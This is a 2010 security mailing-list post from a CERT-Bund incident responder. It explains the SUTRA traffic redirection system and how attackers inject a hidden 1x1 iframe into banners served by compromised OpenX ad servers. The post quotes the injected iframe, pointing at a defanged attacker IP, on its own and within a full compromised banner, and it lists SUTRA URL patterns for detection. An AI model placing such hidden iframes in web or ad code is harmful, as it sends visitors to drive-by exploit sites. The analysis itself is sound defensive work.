[nsp-sec] iframe on OpenX server: similar experiences exploit experiences with AS6851

Thomas Hungenberg th.lab at hungenberg.net
Thu Aug 19 07:46:47 EDT 2010 

Carles Fragoso schrieb:
> Sorry ... what's SUTRA?

SUTRA TDS is a traffic redirection system.
Some info here (Google translation):
http://translate.google.de/translate?sl=ru&tl=en&u=http://www.kytoon.com/sutra-tds.html

It's a popular tool to redirect users from injected IFRAMEs to different drive-by-exploit sites.
I haven't seen a legit use of SUTRA yet...

SUTRA URLs usually end in '.../tds/in.cgi?default' or '.../tds/in.cgi?[0-9]'


> Interesting ... thanks for the feedback. It would be great to find which is the way they are taking profit of append function.

The banner code delivered by OpenX looks like:
---------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' [...]
<img src='http://openx.server.tld/www/images/b6a45697ed960c91569.jpg' width='180' height='120' alt='' title='' border='0' /></a>
<div id='beacon_db403b7c44' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://openx.server.tld/www/delivery/lg.php?bannerid=12&campaignid=8&zoneid=3&cb=db402b7c44'
 width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>
---------------------

On compromised OpenX servers, the attackers install an append function with code like this:
---------------------
<iframe src="h[XX]p://85.234.190.62/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
---------------------

So the banner code for several campaigns delivered by the OpenX server on sp.fcbarcelona.cat
looked like this on Tuesday:
---------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' [...]
<img src='http://openx.server.tld/www/images/b6a45697ed960c91569.jpg' width='180' height='120' alt='' title='' border='0' /></a>
<div id='beacon_db403b7c44' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://openx.server.tld/www/delivery/lg.php?bannerid=12&campaignid=8&zoneid=3&cb=db402b7c44'
 width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
<iframe src="h[XX]p://85.234.190.62/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</body>
</html>
---------------------


Hope this helps.


     - Thomas

CERT-Bund Incident Response & Anti-Malware Team

More information about the nsp-security mailing list